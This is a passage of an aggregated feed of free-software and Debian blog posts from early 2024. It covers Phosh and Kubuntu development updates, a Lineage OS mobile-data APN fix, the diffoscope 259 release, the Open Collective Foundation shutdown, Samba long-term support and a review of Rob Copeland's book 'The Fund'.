<li>Filter lockscreen plugins on lockscreen page: <a href="https://gitlab.gnome.org/World/Phosh/phosh-mobile-settings/-/merge_requests/113">Merge Request</a></li>
</ul>
<h2>Phosh OSK Stub</h2>
<ul>
<li>Add OSK side workaround for splash timeouts until GTK side is merged: <a href="https://gitlab.gnome.org/guidog/phosh-osk-stub/-/merge_requests/129">Merge Request</a></li>
<li>Update emoji data: <a href="https://gitlab.gnome.org/guidog/phosh-osk-stub/-/merge_requests/128">Merge Request</a></li>
</ul>
<h2>Livi Video Player</h2>
<ul>
<li>Remember stream position: <a href="https://gitlab.gnome.org/guidog/livi/-/merge_requests/26">Merge Request</a></li>
<li>Label SDH subtitles: <a href="https://gitlab.gnome.org/guidog/livi/-/merge_requests/36">Merge Request</a></li>
<li>Show controls when window becomes active: <a href="https://gitlab.gnome.org/guidog/livi/-/merge_requests/37">Merge Request</a></li>
</ul>
<h2>Phosh.mobi Website</h2>
<ul>
<li>Directly link to tarballs from the release page, e.g. <a href="https://phosh.mobi/releases/rel-0.36.0/#phosh-0360-1">here</a></li>
</ul>
<p>If you want to support my work see <a href="https://honk.sigxcpu.org/piki/donations/">donations</a>.</p>2024-03-01T17:07:00+00:00Guido GüntherScarlett Gately Moore: Kubuntu: Week 4, Feature Freeze and what comes next.
https://www.scarlettgatelymoore.dev/kubuntu-week-4-feature-freeze-and-what-comes-next/
<div class="wp-block-image">
<figure class="aligncenter size-full"><img alt="" class="has-transparency wp-image-420" height="246" src="https://www.scarlettgatelymoore.dev/wp-content/uploads/face.png" width="246" /></figure></div>
<p>First I would like to give a big congratulations to <a href="https://kde.org">KDE</a> for a superb <a href="https://kde.org/announcements/megarelease/6/">KDE 6 mega release</a> <img alt="🙂" class="wp-smiley" src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f642.png" style="height: 1em;" /> While we couldn’t go with 6 on our upcoming LTS release, I do recommend <a href="https://neon.kde.org/">KDE neon</a> if you want to give it a try! I want to say it again, I firmly stand by the Kubuntu Council in the decision to stay with the rock solid Plasma 5 for the 24.04 LTS release. The timing was just too close to feature freeze, and the last time we went with the shiny new stuff on an LTS release, it was a nightmare ( KDE 4 anyone? ). So without further ado, my weekly wrap-up.</p>
<p><strong>Kubuntu:</strong></p>
<p>Continuing efforts from last week <a href="https://www.scarlettgatelymoore.dev/kubuntu-week-3-wrap-up-contest-kde-snaps-debian-uploads/">Kubuntu: Week 3 wrap up, Contest! KDE snaps, Debian uploads.</a>, it has been another wild and crazy week getting everything in before feature freeze yesterday. We will still be uploading the upcoming Plasma 5.27.11 as it is a bug fix release <img alt="🙂" class="wp-smiley" src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f642.png" style="height: 1em;" /> and right now it is all about finding and fixing bugs! Aside from many uploads, my accomplishments this week are:</p>
<ul>
<li>Kept a close eye on <a href="https://ubuntu-archive-team.ubuntu.com/proposed-migration/noble/update_excuses.html">Excuses</a> and fixed tests as needed. Seems riscv64 tests were turned off by default which broke several of our builds.</li>
<li>I did a complete revamp of our seed / kubuntu-desktop meta package! I have ensured we are following <a href="https://community.kde.org/Distributions/Packaging_Recommendations">KDE packaging recommendations</a>. Unfortunately, we cannot ship maliit-keyboard as we get hit by <a href="https://bugs.launchpad.net/ubuntu/+source/maliit-keyboard/+bug/2039721">LP 2039721</a> which makes for an unpleasant experience.</li>
<li>I did some more work on our custom plasma-welcome which now just needs some branding, which leads to a friendly reminder the contest is still open! <a href="https://kubuntu.org/news/kubuntu-graphic-design-contest/" rel="noreferrer noopener" target="_blank">https://kubuntu.org/news/kubuntu-graphic-design-contest/</a></li>
<li>Bug triage! Oh so many bugs! From back when I worked on Kubuntu 10 years ago and Plasma 5 was new… I am triaging and reducing this list to more recent bugs ( which is a much smaller list ). This reaffirms our decision to go with rock solid, stable Plasma 5 for this LTS release.</li>
<li>I spent some time debugging kio-gdrive, which no longer works ( it works in Jammy ), so I am tracking down what is broken. I thought it was 2FA, but my non-2FA account doesn’t work either; it just repeatedly throws up the Google auth dialog. So this is still a WIP. It was suggested to me to disable online accounts altogether, but I would prefer to give users the full experience.</li>
<li>Fixed our ISO builds. We are still not quite ready for testers as we have some Calamares fixes in the pipeline. Be on the lookout for a call for testers soon <img alt="🙂" class="wp-smiley" src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f642.png" style="height: 1em;" /></li>
<li>Wrote a script to update our ( Kubuntu ) packageset to cover all the new packages accumulated over the years and remove packages that are defunct / removed.</li>
</ul>
<p>What comes next? Testing, testing, testing! Bug fixes and of course our re-branding. My focus is on bug triage right now. I am also working on new projects in launchpad to easily track our bugs as right now they are all over the place and hard to track down.</p>
<p><strong>Snaps:</strong></p>
<p>I have started the MRs to fix our latest 23.08.5 snaps and hope to get them finished in the next week or so. I have also been speaking to a prospective student with some GSoC ideas that I really like and will mentor; hopefully we are not too late.</p>
<p>Happy with my work? My continued employment depends on you! Please consider a donation <a href="http://kubuntu.org/donate">http://kubuntu.org/donate</a></p>
<p>Thank you!</p>2024-03-01T16:38:22+00:00sgmooreJunichi Uekawa: March.
http://www.netfort.gr.jp/~dancer/diary/daily/2024-Mar-1.html.en#2024-Mar-1-22:05:43
March. Busy days.
<p></p>2024-03-01T13:05:43+00:00Junichi UekawaRavi Dwivedi: Fixing Mobile Data issue on Lineage OS
https://ravidwivedi.in/posts/fix-internet-on-lineage-os/
<p>I have used Lineage OS on a couple of phones, but I noticed that mobile data internet was not working well on it. I am not sure why; this was the case on both a Xiaomi Mi A2 and a OnePlus 9 Pro. One day I met <a href="https://contrapunctus.codeberg.page/">contrapunctus</a>, and they looked at their phone's settings, applied the same settings on mine, and it worked. So, I am going to write down here what worked for me.</p>
<p>The trick is to add an access point.</p>
<p>Go to Settings -> Network Settings -> Your SIM settings -> Access Point Names -> Click on ‘+’ symbol.</p>
<p>In the <code>Name</code> section, you can write anything; I wrote <code>test</code>. In the <code>APN</code> section, write <code>www</code>, then save. Below is a screenshot demonstrating the settings you have to change.</p>
<figure>
<img src="https://ravidwivedi.in/images/APN-screenshot.png" width="250" />
<center><h4>APN settings screenshot. Notice the circled entries.</h4></center>
</figure>
<p>This APN will show in the list of APNs and you need to select this one.</p>
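<p>For reference, the same access point can be expressed in the <code>apns-conf.xml</code> format that Android-based systems like Lineage OS use for their built-in APN database. This is only an illustrative sketch, not something you need to edit: the <code>carrier</code> label matches the name used above, while the <code>mcc</code>/<code>mnc</code> values are placeholders you would have to replace with your operator's country and network codes:</p>

```xml
<!-- Hypothetical apns-conf.xml entry mirroring the manual settings above.
     "test" is the arbitrary display name, "www" is the APN itself.
     mcc/mnc are placeholder codes, not real operator values. -->
<apn carrier="test"
     mcc="000"
     mnc="00"
     apn="www"
     type="default" />
```

<p>Adding the APN through the Settings UI as described above achieves the same result without editing any files.</p>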
<p>After this, my mobile data started working well and I started getting speeds according to my data plan. This is what worked for me in Lineage OS. Hopefully, it was of help to you :D</p>
<p>I will meet you in the next post.</p>2024-03-01T09:04:08+00:00Ravi DwivediReproducible Builds (diffoscope): diffoscope 259 released
https://diffoscope.org/news/diffoscope-259-released/
<p>The diffoscope maintainers are pleased to announce the release of diffoscope
version <code class="language-plaintext highlighter-rouge">259</code>. This version includes the following changes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[ Chris Lamb ]
* Don't error-out with a traceback if we encounter "struct.unpack"-related
errors when parsing .pyc files. (Closes: #1064973)
* Fix compatibility with PyTest 8.0. (Closes: reproducible-builds/diffoscope#365)
* Don't try and compare rdb_expected_diff on non-GNU systems as %p formatting
can vary. (Re: reproducible-builds/diffoscope#364)
</code></pre></div></div>
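<p>For context, the <code>struct.unpack</code> change concerns truncated or corrupt <code>.pyc</code> files. The general pattern is to catch <code>struct.error</code> and degrade gracefully instead of letting a traceback escape; the sketch below illustrates this (it is not diffoscope's actual code, and the function name is made up):</p>

```python
import struct

def read_pyc_header(data):
    # A .pyc file starts with a 4-byte magic number; here we also read
    # the 4-byte little-endian word that follows it. Truncated or corrupt
    # input makes struct.unpack raise struct.error, which we convert
    # into a None result instead of an unhandled traceback.
    try:
        magic, word = struct.unpack("<4sI", data[:8])
    except struct.error:
        return None
    return magic, word
```

<p>With this pattern, a short or garbage buffer yields <code>None</code>, so the caller can fall back to a plain binary comparison rather than aborting the whole run.</p>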
<p>You can find out more by <a href="https://diffoscope.org">visiting the project homepage</a>.</p>2024-03-01T00:00:00+00:00Reproducible Builds (diffoscope)Russell Coker: Links February 2024
https://etbe.coker.com.au/2024/02/29/links-february-2024/
<p><a href="https://www.antipope.org/charlie/blog-static/2018/01/dude-you-broke-the-future.html">In 2018 Charles Stross wrote an insightful blog post Dude You Broke the Future [1]</a>. It covers AI in both fiction and fact and corporations (the real AIs) and the horrifying things they can do right now.</p>
<p><a href="https://longnow.org/ideas/magnum-opus/">LongNow has an interesting article about the concept of the Magnum Opus [2]</a>. As an aside I’ve been working on SE Linux for 22 years.</p>
<p><a href="https://locusmag.com/2023/11/commentary-by-cory-doctorow-dont-be-evil/">Cory Doctorow wrote an insightful article about the incentives for enshittification of the Internet and how economic issues and regulations shape that [3]</a>.</p>
<p><a href="https://media.ccc.de/v/37c3-11859-operation_triangulation_what_you_get_when_attack_iphones_of_researchers">CCC has a lot of great talks, and this talk from the latest CCC about Operation Triangulation, an attack on the iPhones of Kaspersky researchers, is particularly epic [4]</a>.</p>
<p><a href="https://marketplace.goodcar.co/cars">GoodCar is an online sales site for electric cars in Australia [5]</a>.</p>
<p><a href="https://the.curlybracket.net/2023/12/21/unpaid-work.html">Ulrike wrote an insightful blog post about how the reliance on volunteer work in the FOSS community hurts diversity [6]</a>.</p>
<p><a href="https://pluralistic.net/2023/10/21/the-internets-original-sin/">Cory Doctorow wrote an insightful article about The Internet’s Original Sin, which is misuse of copyright law [7]</a>. He advocates using copyright strictly for its intended purpose and creating other laws for privacy, labor rights, etc.</p>
<p><a href="https://www.davidbrin.com/nonfiction/neoteny1.html">David Brin wrote an interesting article on neoteny and sexual selection in humans [8]</a>.</p>
<p><a href="https://media.ccc.de/v/37c3-12047-software_licensing_for_a_circular_economy">37C3 has an interesting lecture about software licensing for a circular economy which includes environmental savings from better code [9]</a>. Now they track efficiency in KDE bug reports!</p>
<ul>
<li>[1]<a href="https://www.antipope.org/charlie/blog-static/2018/01/dude-you-broke-the-future.html"> http://tinyurl.com/2estdwk6</a></li>
<li>[2]<a href="https://longnow.org/ideas/magnum-opus/"> https://longnow.org/ideas/magnum-opus/</a></li>
<li>[3]<a href="https://locusmag.com/2023/11/commentary-by-cory-doctorow-dont-be-evil/"> http://tinyurl.com/ymngs25y</a></li>
<li>[4]<a href="https://media.ccc.de/v/37c3-11859-operation_triangulation_what_you_get_when_attack_iphones_of_researchers"> http://tinyurl.com/yum44rag</a></li>
<li>[5]<a href="https://marketplace.goodcar.co/cars"> https://marketplace.goodcar.co/cars</a></li>
<li>[6]<a href="https://the.curlybracket.net/2023/12/21/unpaid-work.html"> https://the.curlybracket.net/2023/12/21/unpaid-work.html</a></li>
<li>[7]<a href="https://pluralistic.net/2023/10/21/the-internets-original-sin/"> http://tinyurl.com/2ye7hl4g</a></li>
<li>[8]<a href="https://www.davidbrin.com/nonfiction/neoteny1.html"> https://www.davidbrin.com/nonfiction/neoteny1.html</a></li>
<li>[9]<a href="https://media.ccc.de/v/37c3-12047-software_licensing_for_a_circular_economy"> http://tinyurl.com/2c7mjw2z</a></li>
</ul>
2024-02-29T12:05:01+00:00etbeDaniel Lange: Opencollective shutting down
https://daniel-lange.com/archives/186-Opencollective-shutting-down.html
<p><strong>Update 28.02.2024 19:45 CET:</strong> There is now a blog entry at <a href="https://blog.opencollective.com/open-collective-official-statement-ocf-dissolution/">https://blog.opencollective.com/open-collective-official-statement-ocf-dissolution/</a> trying to discern the legal entities in the Open Collective ecosystem and recommending potential ways forward.</p>
<hr />
<p>Gee, there is nothing on <a href="https://blog.opencollective.com/">their blog</a> yet, but I just [28.02.2024 00:07 CET] received this email from Mike Strode, Program Officer at the Open Collective Foundation:</p>
<p>Dear Daniel Lange,</p>
<p>It is with a heavy heart that I'm writing today to inform you that the
Board of Directors of the Open Collective Foundation (OCF) has made the
difficult decision to dissolve OCF, effective December 31, 2024.</p>
<p>We are proud of the work we have been able to do together. We have been
honored to build community with you and the hundreds of other collectives
hosted at the Open Collective Foundation.</p>
<p><strong>What you need to know:</strong></p>
<p>We are beginning <strong>a staged dissolution process</strong> that will allow our over
600 collectives the time to close or transition their work. Dissolving OCF
will take many months, and involves settling all liabilities while spending
down all funds in a legally compliant manner.</p>
<p><strong>Our priority is to support our collectives in navigating this change.</strong> We
want to provide collectives the longest possible runway to wind down or
transition their operations while we focus on the many legal and financial
tasks associated with dissolving a nonprofit.</p>
<p><strong>March 15</strong> is the last day to accept donations. You will have until <strong>September 30</strong>
to work with us to develop and implement a plan to spend down the money
in your fund. Key dates are included at the bottom of this email.</p>
<p>We know this is going to be difficult, and we will do everything we can to
ease the transition for you.</p>
<p><strong>How we will support collectives:</strong></p>
<p>It remains our fiduciary responsibility to safeguard each collective's
charitable assets and ensure funds are used solely for specified charitable
purposes.</p>
<p>We will be providing assistance and support to you, whether you choose to
spend out and close down your collective or continue your work through
another 501(c)(3) organization or fiscal sponsor.</p>
<p>Unfortunately, we had to say goodbye to several of our colleagues today as
we pare down our core staff to reduce costs. I will be staying on staff to
support collectives through this transition, along with Wayne Kleppe, our
Finance Administrator.</p>
<p><strong>What led to this decision:</strong></p>
<p>From day one, OCF was committed to experimentation and innovation. We were
dedicated to finding new ways to open up the nonprofit space, making it
easier for people to raise and access funding so they can do good in their
communities.</p>
<p>OCF was created by Open Collective Inc. (OCI), a company formed in 2015
with the goal of "enabling groups to quickly set up a collective, raise
funds and manage them transparently." Soon after being founded by OCI, OCF
went through a period of rapid growth. We responded to increased demand
arising from the COVID-19 pandemic without taking the time to establish the
appropriate systems and infrastructure to sustain that growth.</p>
<p>Unfortunately, over the past year, we have learned that Open Collective
Foundation's business model is not sustainable with the number of complex
services we have offered and the fees we pay to the Open Collective Inc.
tech platform.</p>
<p>In late 2023, we made the decision to pause accepting new collectives in
order to create space for us to address the issues. Unfortunately, it
became clear that it would not be financially feasible to make the
necessary corrections, and we determined that OCF is not viable.</p>
<p><strong>What's next:</strong></p>
<p>We know this news will raise questions for many of our collectives. We will
be making space for questions and reactions in the coming weeks.</p>
<p>In the meantime, we have developed this FAQ which we will keep updated as
more questions come in.</p>
<p><strong>What you need to do next:</strong></p>
<ul>
<li>Review the FAQ</li>
<li>Discuss your options within your collective. Your options are:
<ul>
<li>spend down and close out your collective</li>
<li>spend down and transfer your collective to another fiscal sponsor,
or</li>
<li>transfer your collective and funds to another charitable
organization.</li>
</ul></li>
<li><strong>Reply-all</strong> to this email with any questions, requests, or to set up a
time to talk. Please make sure generalinquiries@opencollective.org is
copied on your email.</li>
</ul>
<p><strong>Dates to know:</strong></p>
<ul>
<li>Last day to accept funds/receive donations: March 15, 2024</li>
<li>Last day collectives can have employees: June 30, 2024</li>
<li>Last day to spend or transfer funds: September 30, 2024</li>
</ul>
<p>In Care & Accompaniment,<br />
Mike Strode<br />
<em>Program Officer</em><br />
<em>Open Collective Foundation</em></p>
<p><em>Our mailing address has changed! We are now located at 440 N. Barranca
Avenue #3717, Covina, CA 91723, USA</em></p>2024-02-28T07:45:00+00:00Daniel LangeAdnan Hodzic: App architecture with reliability in mind: From Kubernetes to Serverless with GCP Cloud Build & Cloud Run
https://foolcontrol.org/?p=4621
<p>The blog post you’re reading is hosted on a private Kubernetes cluster that runs inside my home. Another workload that’s running on the same cluster is...</p>
<p>The post <a href="https://foolcontrol.org/?p=4621">App architecture with reliability in mind: From Kubernetes to Serverless with GCP Cloud Build & Cloud Run</a> appeared first on <a href="https://foolcontrol.org">FoolControl: Phear the penguin</a>.</p>2024-02-26T20:00:23+00:00Adnan HodzicSergio Durigan Junior: Planning to orphan Pagure on Debian
https://blog.sergiodj.net/posts/planning-to-orphan-pagure/
<p>I have been thinking more and more about orphaning the <a href="https://tracker.debian.org/pagure">Pagure Debian
package</a>. I don’t have the time to maintain it properly anymore, and
I have also lost interest in doing so.</p>
<h2 id="what-s-pagure">What’s Pagure</h2>
<p><a href="https://pagure.io/pagure">Pagure</a> is a git forge written entirely in Python using pygit2. It was
almost entirely developed by one person, Pierre-Yves Chibon. He is
(was?) a Red Hat employee and started working on this new git forge
almost 10 years ago because the company wanted to develop something
in-house for Fedora. The software is amazing and I admire Pierre-Yves
quite a lot for what he was able to achieve basically alone.
Unfortunately, a few years ago Fedora <a href="https://communityblog.fedoraproject.org/making-a-git-forge-decision/">decided</a> to move to Gitlab and
the Pagure development pretty much stalled.</p>
<h2 id="pagure-in-debian">Pagure in Debian</h2>
<p>Packaging Pagure for Debian was hard, but it was also very fun. I
learned quite a bit about many things (packaging and non-packaging
related), interacted with the upstream community, decided to dogfood
my own work and run my Pagure instance for a while, and tried to get
newcomers to help me with the package (without much success,
unfortunately).</p>
<p>I remember that when I had started to package Pagure, Debian was also
moving away from Alioth and discussing options. For a brief moment
Pagure was a contender, but in the end the community decided to
self-host Gitlab, and that’s why we have <a href="https://salsa.debian.org">Salsa</a> now. I feel like I
could have tipped the scales in favour of Pagure had I finished
packaging it for Debian before the decision was made, but then again,
to the best of my knowledge Salsa doesn’t use our Gitlab package
anyway…</p>
<h2 id="are-you-interested-in-maintaining-it">Are you interested in maintaining it?</h2>
<p>If you’re interested in maintaining the package, please get in touch
with me. I will happily pass the torch to someone else who is still
using the software and wants to keep it healthy in Debian. If there
is nobody interested, then I will just orphan it.</p>2024-02-26T03:23:00+00:00Sergio Durigan JuniorFreexian Collaborators: Long term support for Samba 4.17
https://www.freexian.com/blog/samba-4.17-lts/
<p>Freexian is pleased to announce a partnership with
<a href="https://www.catalyst.net.nz/samba-and-windows-integration">Catalyst</a> to extend
the security support of
Samba 4.17, which is the version packaged in Debian 12 Bookworm. Samba 4.17 will
reach upstream’s end-of-support this upcoming March (2024), and the goal of this
partnership is to extend it until June 2028 (i.e. the end of Debian 12’s
regular security support).</p>
<p>One of the main aspects of this project is that it will also include
support for Samba as Active Directory Domain Controller (AD-DC). Unfortunately,
support for Samba as AD-DC in
<a href="https://lists.debian.org/debian-security-announce/2023/msg00169.html">Debian 11 Bullseye</a>,
<a href="https://lists.debian.org/debian-security-announce/2021/msg00201.html">Debian 10 Buster</a>
and older releases has been discontinued before the end of the
life cycle of those Debian releases. So we really expect to improve the
situation of Samba in <em>Debian 12 Bookworm</em>, ensuring full support during the 5
years of regular security support.</p>
<p>We would like to mention that this is an experiment, and we will
do our best to make it a success, and to try to continue it for Samba versions
included in future Debian releases.</p>
<p>Our long term goal is to bring confidence to Samba’s upstream development
community that they can mark some releases as being supported for 5 years (or
more) and that the corresponding work will be funded by companies that benefit
from this work (because we would have already built that community).</p>
<p>If your company relies on Samba and wants to help sustain LTS versions of
Samba, please reach out to us. For companies using Debian, the simplest way is
to subscribe to our <a href="https://www.freexian.com//lts/debian/">Debian LTS offer</a> at a gold
level (or above) and let us know that you want to contribute to Samba LTS when
you send your subscription form. For others, please reach out to us at
<a href="mailto:sales@freexian.com">sales@freexian.com</a> and we will figure out a way to
contribute.</p>
<p>In the meantime, this project has been possible thanks to the current
<a href="https://www.freexian.com//lts/debian/#sponsors">LTS sponsors</a> and
<a href="https://www.freexian.com//lts/extended/">ELTS customers</a>. We hope the whole community of
Debian and Samba users
will benefit from it.</p>
<p>For any question, don’t hesitate to <a href="https://www.freexian.com/contact/">contact us</a>.</p>2024-02-26T00:00:00+00:00Freexian CollaboratorsBen Hutchings: Converted from Pyblosxom to Jekyll
https://www.decadent.org.uk/ben/blog/2024/02/25/converted-from-pyblosxom-to-jekyll.html
<p>I’ve been using Pyblosxom here for nearly 17 years, but have become
increasingly dissatisfied with having to write HTML instead of
Markdown.</p>
<p>Today I looked at upgrading my web server and discovered that
Pyblosxom was removed from Debian after Debian 10, presumably because
it wasn’t updated for Python 3.</p>
<p>I keep hearing about Jekyll as a static site generator for blogs, so I
finally investigated how to use that and how to convert my existing
entries. Fortunately it supports both HTML and Markdown (and probably
other) input formats, so this was mostly a matter of converting
metadata.</p>
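<p>For reference, Jekyll identifies each entry by a small YAML front-matter block at the top of the file, so the conversion mostly amounts to producing something like the following sketch (the layout, title, and date values here are illustrative, using this post’s own metadata, not taken from the actual converted files):</p>

```yaml
---
layout: post
title: "Converted from Pyblosxom to Jekyll"
date: 2024-02-25 20:55:54 +0000
---

Entry body, in Markdown or HTML.
```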
<p>I have my own crappy script for drafting, publishing, and listing
blog entries, which also needed a bit of work to update, but that is
now done.</p>
<p>If all has gone to plan, you should be seeing just one new entry in
the feed but all permalinks to older entries still working.</p>2024-02-25T20:55:54+00:00Ben HutchingsRuss Allbery: Review: The Fund
https://www.eyrie.org/~eagle/reviews/books/1-250-27694-2.html
<p>Review: <cite>The Fund</cite>, by Rob Copeland</p>
<table>
<tbody><tr>
<td>Publisher:</td>
<td>St. Martin's Press</td>
</tr>
<tr>
<td>Copyright:</td>
<td>2023</td>
</tr>
<tr>
<td>ISBN:</td>
<td>1-250-27694-2</td>
</tr>
<tr>
<td>Format:</td>
<td>Kindle</td>
</tr>
<tr>
<td>Pages:</td>
<td>310</td>
</tr></tbody></table>
<p>
I first became aware of Ray Dalio when either he or his publisher
plastered advertisements for <cite>The Principles</cite> all over the San
Francisco 4th and King Caltrain station. If I recall correctly, there
were also constant radio commercials; it was a whole thing in 2017. My
brain is very good at tuning out advertisements, so my only thought at the
time was "some business guy wrote a self-help book." I think I vaguely
assumed he was a CEO of some traditional business, since that's usually
who writes heavily marketed books like this. I did not connect him with
hedge funds or Bridgewater, which I have a bad habit of confusing with
Blackwater.
</p>
<p>
<cite>The Principles</cite> turns out to be more of a laundered cult manual than
a self-help book. And therein lies a story.
</p>
<p>
Rob Copeland is currently with <cite>The New York Times</cite>, but for many
years he was the hedge fund reporter for <cite>The Wall Street Journal</cite>.
He covered, among other things, Bridgewater Associates, the enormous hedge
fund founded by Ray Dalio. <cite>The Fund</cite> is a biography of Ray Dalio
and a history of Bridgewater from its founding as a vehicle for Dalio's
advising business until 2022 when Dalio, after multiple false starts and
title shuffles, finally retired from running the company. (Maybe. Based
on the history recounted here, it wouldn't surprise me if he was back at
the helm by the time you read this.)
</p>
<p>
It is one of the wildest, creepiest, and most abusive business histories
that I have ever read.
</p>
<p>
It's probably worth mentioning, as Copeland does explicitly, that Ray
Dalio and Bridgewater hate this book and claim it's a pack of lies.
Copeland includes some of their denials (and many non-denials that sound
as good as confirmations to me) in footnotes that I found increasingly
amusing.
</p>
<blockquote><p>
A lawyer for Dalio said he "treated all employees equally, giving
people at all levels the same respect and extending them the same
perks."
</p></blockquote>
<p>
Uh-huh.
</p>
<p>
Anyway, I personally know nothing about Bridgewater other than what I
learned here and the occasional mention in Matt Levine's newsletter (which
is where I got the recommendation for this book). I have no independent
information whether anything Copeland describes here is true, but Copeland
provides the typical extensive list of notes and sourcing one expects in a
book like this, and Levine's comments indicated it's generally consistent
with Bridgewater's industry reputation. I think this book is true, but
since the clear implication is that the world's largest hedge fund was
primarily a deranged cult whose employees mostly spied on and rated each
other rather than doing any real investment work, I also have questions,
not all of which Copeland answers to my satisfaction. But more on that
later.
</p>
<p>
The center of this book is the Principles. These were an ever-changing
list of rules and maxims for how people should conduct themselves within
Bridgewater. Per Copeland, although Dalio later published a book by that
name, the version of the Principles that made it into the book was
sanitized and significantly edited down from the version used inside the
company. Dalio was constantly adding new ones and sometimes changing
them, but the common theme was radical, confrontational "honesty": never
being silent about problems, confronting people directly about anything
that they did wrong, and telling people all of their faults so that they
could "know themselves better."
</p>
<p>
If this sounds like textbook abusive behavior, you have the right idea.
This part Dalio admits to openly, describing Bridgewater as a firm that
isn't for everyone but that achieves great results because of this
culture. But the uncomfortably confrontational vibes are only the tip of
the iceberg of dysfunction. Here are just a few of the ways this played
out according to Copeland:
</p>
<ul>
<li><p>
Dalio decided that everyone's opinions should be weighted by the
accuracy of their previous decisions, to create a "meritocracy," and
therefore hired people to build a social credit system in which people
could use an app to constantly rate all of their co-workers. This
almost immediately devolved into out-group bullying worthy of a high
school, with employees hurriedly down-rating and ostracizing any
co-worker that Dalio down-rated.
</p></li>
<li><p>
When an early version of the system uncovered two employees at
Bridgewater with more credibility than Dalio, Dalio had the system
rigged to ensure that he always had the highest ratings and was not
affected by other people's ratings.
</p></li>
<li><p>
Dalio became so obsessed with the principle of confronting problems
that he created a centralized log of problems at Bridgewater and
required employees to find and report a quota of ten or twenty new issues
every week or have their bonus docked. He would then regularly pick
some issue out of the issue log, no matter how petty, and treat it
like a referendum on the worth of the person responsible for the
issue.
</p></li>
<li><p>
Dalio's favorite way of dealing with a problem was to put someone on
trial. This involved extensive investigations followed by a meeting
where Dalio would berate the person and harshly catalog their flaws,
often reducing them to tears or panic attacks, while smugly insisting
that having an emotional reaction to criticism was a personality flaw.
These meetings were then filmed and added to a library available to
all Bridgewater employees, often edited to remove Dalio's personal
abuse and to make the emotional reaction of the target look
disproportionate. The ones Dalio liked the best were shown to all new
employees as part of their training in the Principles.
</p></li>
<li><p>
One of the best ways to gain institutional power in Bridgewater was to
become sycophantically obsessed with the Principles and to be an eager
participant in Dalio's trials. The highest levels of Bridgewater
featured constant jockeying for power, often by trying to catch rivals
in violations of the Principles so that they would be put on trial.
</p></li>
</ul>
<p>
In one of the common and all-too-disturbing connections between Wall
Street finance and the United States' dysfunctional government, James
Comey (yes, <a href="https://en.wikipedia.org/wiki/James_Comey">that James
Comey</a>) ran internal security for Bridgewater for three years, meaning
that he was the one who pulled evidence from surveillance cameras for
Dalio to use to confront employees during his trials.
</p>
<p>
In case the cult vibes weren't strong enough already, Bridgewater
developed its own idiosyncratic language worthy of Scientology. The
trials were called "probings," firing someone was called "sorting" them,
and rating them was called "dotting," among many other
Bridgewater-specific terms. Needless to say, no one ever probed Dalio
himself. You will also be completely unsurprised to learn that Copeland
documents instances of sexual harassment and discrimination at
Bridgewater, including some by Dalio himself, although that seems to be a
relatively small part of the overall dysfunction. Dalio was happy to
publicly humiliate anyone regardless of gender.
</p>
<p>
If you're like me, at this point you're probably wondering how Bridgewater
continued operating for so long in this environment. (Per Copeland, since
Dalio's retirement in 2022, Bridgewater has drastically reduced the
cult-like behaviors, deleted its archive of probings, and de-emphasized the
Principles.) It was not actually a religious cult; it was a hedge fund
that had to provide investment services to huge, sophisticated clients,
and by all accounts it's a very successful one. Why did this bizarre
nightmare of a workplace not interfere with Bridgewater's business?
</p>
<p>
This, I think, is the weakest part of this book. Copeland makes a few
gestures at answering this question, but none of them are very satisfying.
</p>
<p>
First, it's clear from Copeland's account that almost none of the
employees of Bridgewater had any control over Bridgewater's investments.
Nearly everyone was working on other parts of the business (sales,
investor relations) or on cult-related obsessions. Investment decisions
(largely incorporated into algorithms) were made by a tiny core of people
and often by Dalio himself. Bridgewater also appears to not trade
frequently, unlike some other hedge funds, meaning that they probably stay
clear of the more labor-intensive high-frequency parts of the business.
</p>
<p>
Second, Bridgewater took off as a hedge fund just before the hedge fund
boom in the 1990s. It transformed from Dalio's personal consulting
business and investment newsletter to a hedge fund in 1990 (with an
earlier investment from the World Bank in 1987), and the 1990s were a very
good decade for hedge funds. Bridgewater, in part due to Dalio's
connections and effective marketing via his newsletter, became one of the
largest hedge funds in the world, which gave it a sort of institutional
momentum. No one was questioned for putting money into Bridgewater even
in years when it did poorly compared to its rivals.
</p>
<p>
Third, Dalio used the tried and true method of getting free publicity from
the financial press: constantly predict an upcoming downturn, and
aggressively take credit whenever you were right. From nearly the start
of his career, Dalio predicted economic downturns year after year.
Bridgewater did very well in the 2000 to 2003 downturn, and again during
the 2008 financial crisis. Dalio aggressively takes credit for predicting
both of those downturns and positioning Bridgewater correctly going into
them. This is correct; what he avoids mentioning is that he also
predicted downturns in every other year, the majority of which never
happened.
</p>
<p>
These points together create a bit of an answer, but they don't feel like
the whole picture and Copeland doesn't connect the pieces. It seems
possible that Dalio may simply be good at investing; he reads obsessively
and clearly enjoys thinking about markets, and being an abusive cult
leader doesn't take up all of his time. It's also true that to some
extent hedge funds are semi-free money machines, in that once you have a
sufficient quantity of money and political connections you gain access to
investment opportunities and mechanisms that are very likely to make money
and that the typical investor simply cannot access. Dalio is clearly good
at making personal connections, and invested a lot of effort into forming
close ties with tricky clients such as pools of Chinese money.
</p>
<p>
Perhaps the most compelling explanation isn't mentioned directly in this
book but instead comes from Matt Levine. Bridgewater touts its
algorithmic trading over humans making individual trades, and there is
some reason to believe that consistently applying an algorithm without
regard to human emotion is a solid trading strategy in at least some
investment areas. Levine has asked in his newsletter, tongue firmly in
cheek, whether the bizarre cult-like behavior and constant infighting is a
strategy to distract all the humans and keep them from messing with the
algorithm and thus making bad decisions.
</p>
<p>
Copeland leaves this question unsettled. Instead, one comes away from
this book with a clear vision of the most dysfunctional workplace I have
ever heard of, and an endless litany of bizarre events each more
astonishing than the last. If you like watching train wrecks, this is the
book for you. The only drawback is that, unlike other entries in this
genre such as <a href="https://www.eyrie.org/~eagle/reviews/books/1-5247-3166-8.html"><cite>Bad Blood</cite></a> or
<a href="https://www.eyrie.org/~eagle/reviews/books/0-316-46134-2.html"><cite>Billion Dollar Loser</cite></a>, Bridgewater is a
wildly successful company, so you don't get the schadenfreude of seeing a
house of cards collapse. You do, however, get a helpful mental model to
apply to the next person who tries to talk to you about "radical honesty"
and "idea meritocracy."
</p>
<p>
The flaw in this book is that the existence of an organization like
Bridgewater points to systemic flaws in how our society works,
which Copeland is largely uninterested in interrogating. "How could this
have happened?" is a rather large question to leave unanswered. The sheer
outrageousness of Dalio's behavior also gets a bit tiring by the end of
